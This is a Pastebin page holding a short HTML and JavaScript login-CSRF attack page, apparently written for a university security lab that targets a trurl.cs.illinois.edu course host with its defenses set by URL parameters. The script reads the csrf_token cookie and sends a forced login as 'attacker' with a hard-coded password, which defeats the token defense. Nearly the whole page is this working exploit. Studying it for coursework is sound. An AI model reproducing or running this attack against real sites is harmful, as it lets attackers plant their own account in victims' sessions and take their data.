Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function getCookie(cname) {
- var name = cname + "=";
- var ca = document.cookie.split(";");
- for(var i=0; i<ca.length; i++) {
- var c = ca[i];
- while (c.charAt(0)==" ") {
- c = c.substring(1);
- }
- if (c.indexOf(name) != -1) {
- return c.substring(name.length,c.length);
- }
- }
- return "";
- };
- function post(token) {
- $.ajax({
- type: "POST",
- url: "http://trurl.cs.illinois.edu/login?csrfdefense=1&xssdefense=0",
- dataType: "text",
- data: {
- username: "attacker",
- password: "l33th4x",
- csrf_token: token
- }
- });
- }
- $(document).ready(function() {
- $.ajax({
- type: "GET",
- url: "http://trurl.cs.illinois.edu/?csrfdefense=1&xssdefense=0",
- success: function(){
- var token = getCookie("csrf_token");
- post(token);
- }
- });
- });
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement